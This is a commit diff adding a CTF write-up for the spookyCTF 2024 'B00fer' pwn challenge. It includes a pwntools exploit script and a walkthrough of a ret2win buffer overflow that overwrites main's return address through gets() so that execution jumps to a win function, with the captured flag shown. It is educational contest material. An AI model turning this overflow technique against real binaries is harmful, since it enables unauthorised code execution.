Adds CTFs to content

Add CTFs from 2024 to the content, htb apocalypse, spookyCTF,
buckeye ctf and some edits to the 404 ctf

content/writeups/2024/spookyCTF/pwn/B00fer/exploit.py

@@ -0,0 +1,49 @@
+#!/usr/bin/python3
+from pwn import *
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    elif args.SSH:
+        exe = remote_exe
+        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+        return s.process([exe] + argv)
+    else:  # Run locally
+        exe = local_exe
+        return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+'''.format(**locals())
+
+
+# Set up pwntools for the correct architecture
+local_exe = 'B00fer'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'error'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+payload = flat(
+        b'\x00'*5*8,
+        p64(0x401227) 
+        )
+
+write("payload", payload)
+
+io = start()
+
+io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
+
+io.recvline().decode()
+print(io.recvline().decode())

content/writeups/2024/spookyCTF/pwn/B00fer/flag.txt

@@ -0,0 +1 @@
+Furtest{FAKE_FLAG}

content/writeups/2024/spookyCTF/pwn/B00fer/index.md

@@ -0,0 +1,85 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'B00fer'
+tags = [ 'pwn' ]
++++
+
+## Intro
+
+Name: B00fer  
+Description:   
+    The Consortium sent us this file and connection info. Looks like they are taunting us.  
+    They are running the file at b00fer.niccgetsspooky.xyz, at port 9001. Try to get them to give up the flag.  
+    `nc b00fer.niccgetsspooky.xyz 9001`  
+Author: [Robert Blacha](https://github.com/RobertPBlacha)  
+  
+This will be a pwn challenge seeing the name and the fact that we are given a remote.  
+We are only given the binary, no source code.  
+
+## Exploring
+  
+Running checksec we see :
+- No stack canary
+- No PIE
+- The binary is not stripped
+
+Running the program we are asked for an input without much info on what to enter.
+
+Let's spin up ghidra and see what we're dealing with.
+```C
+int main(void)
+{
+  char buffer [32];
+  
+  setvbuf(stdout,(char *)0x0,2,0);
+  puts("Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n");
+  gets(buffer);
+  return 0;
+}
+```
+
+So we are facing a classic ret2win challenge, we even have a beautiful function named win.
+
+```c
+void win(void)
+{
+  char flag [40];
+  FILE *file;
+  
+  file = fopen("flag.txt","r");
+  fread(flag,1,0x20,file);
+  puts(flag);
+  puts("Good!\n");
+  exit(1);
+}
+```
+
+## Exploiting
+
+We simply need to overwrite the return address of main to call win.  
+First let's compute the offset, using pwndbg we find that win is at `0x401227` and that the return address of main will be replaced by the 6th byte in the buffer.  
+
+  
+To finish this we write a nice script using pwntools  
+
+```python
+payload = flat(
+        b'\x00'*5*8,
+        p64(0x401227) 
+        )
+
+io = start()
+
+io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
+
+io.recvline().decode()
+print(io.recvline().decode())
+```
+
+And we get the flag :
+
+```bash
+./exploit.py REMOTE b00fer.niccgetsspooky.xyz 9001
+NICC{Sp00ked_the_fl4g_0ut_of_m3}
+```